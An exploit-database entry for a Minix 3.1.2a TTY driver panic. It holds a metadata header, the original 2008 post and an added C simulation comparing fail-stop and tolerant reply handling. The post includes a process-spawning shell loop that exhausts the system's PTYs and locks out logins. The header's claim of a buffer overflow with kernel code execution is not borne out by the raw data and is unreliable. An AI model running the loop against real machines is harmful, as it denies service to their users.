Vendor: Minix 3.1.2a
By: kokanin
CVSS: 7.8 (HIGH)
Buffer Overflow
CWE: 119
Product Name: Minix 3.1.2a
Affected Version From: 3.1.2a
Affected Version To: 3.1.2a
Patch Exists: YES
Related CWE: N/A
CPE: o:minix:minix_3.1.2a
Platforms Tested: i686
2008

minix 3.1.2a tty panic

A buffer overflow vulnerability exists in Minix 3.1.2a due to improper bounds checking of the tty_reply() function in trunk/src/drivers/tty/tty.c. An attacker can send a specially crafted message to the tty_reply() function, resulting in a stack-based buffer overflow. This can be exploited to execute arbitrary code with kernel privileges.

Mitigation:

Upgrade to the latest version of Minix 3.1.2a

Exploit-DB raw data:

# kokanin@gmail 20080723
# minix 3.1.2a tty panic

trunk/src/drivers/tty/tty.c

  if ((status = send(replyee, &tty_mess)) != OK) {
        panic("TTY","tty_reply failed, status\n", status);
  }

$ uname -a
Minix 192.168.1.2 3 1.2a i686
$ while true ; do (yes "yes yes minix uh ah"&) ; done
[snip snip]
$ ^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C

...disconnected

telnet 192.168.1.2
Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.
I am sorry, but there is no free PTY left!
Connection closed by foreign host.

hai, no moar pty, kthxbye
--
kokanin

# milw0rm.com [2008-07-23]
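
The quoted tty.c lines make any failed reply `send()` fatal to the whole TTY driver. The C simulation below is an added example, not Minix source and not part of the original post: it runs that fail-stop pattern beside a variant that counts and drops the reply. `fake_send`, `E_DEAD_DST`, `reply_fatal`, `reply_tolerant` and `run` are hypothetical names, and it assumes the send fails because the receiving process has already exited.

```c
#include <stdio.h>

#define OK         0     /* hypothetical status codes, constructed for */
#define E_DEAD_DST (-1)  /* this example; not Minix's actual values    */
#define NPROC      8

static int alive[NPROC];     /* constructed process table: 1 = can receive */
static int dropped_replies;  /* counter an operator could monitor */

/* Stand-in for the kernel send(): fails when the destination is gone. */
static int fake_send(int dst)
{
    return (dst >= 0 && dst < NPROC && alive[dst]) ? OK : E_DEAD_DST;
}

/* Pattern in the quoted lines: a failed reply is fatal to the driver.
 * Returns 1 where the driver would have panicked (simulated, no abort). */
static int reply_fatal(int replyee)
{
    return fake_send(replyee) != OK;
}

/* Tolerant variant: count and drop a reply whose receiver has vanished. */
static int reply_tolerant(int replyee)
{
    if (fake_send(replyee) != OK)
        dropped_replies++;
    return 0;  /* driver keeps serving other terminals */
}

/* Constructed workload: replies owed to processes 0..n-1, the odd-numbered
 * ones killed before their reply went out. Returns replies processed. */
static int run(int (*reply)(int), int n)
{
    int done = 0;
    dropped_replies = 0;
    for (int i = 0; i < NPROC; i++) alive[i] = (i % 2 == 0);
    for (int i = 0; i < n; i++, done++)
        if (reply(i)) break;  /* driver is down: nothing further is served */
    return done;
}

int main(void)
{
    int fatal = run(reply_fatal, NPROC);
    int tolerant = run(reply_tolerant, NPROC);
    printf("fatal: %d/%d, tolerant: %d/%d (%d dropped)\n",
           fatal, NPROC, tolerant, NPROC, dropped_replies);
    return 0;
}
```

In the fail-stop run the first dead receiver ends service for every remaining terminal, while the tolerant run processes all eight replies and leaves a dropped-reply count that can be monitored or alerted on.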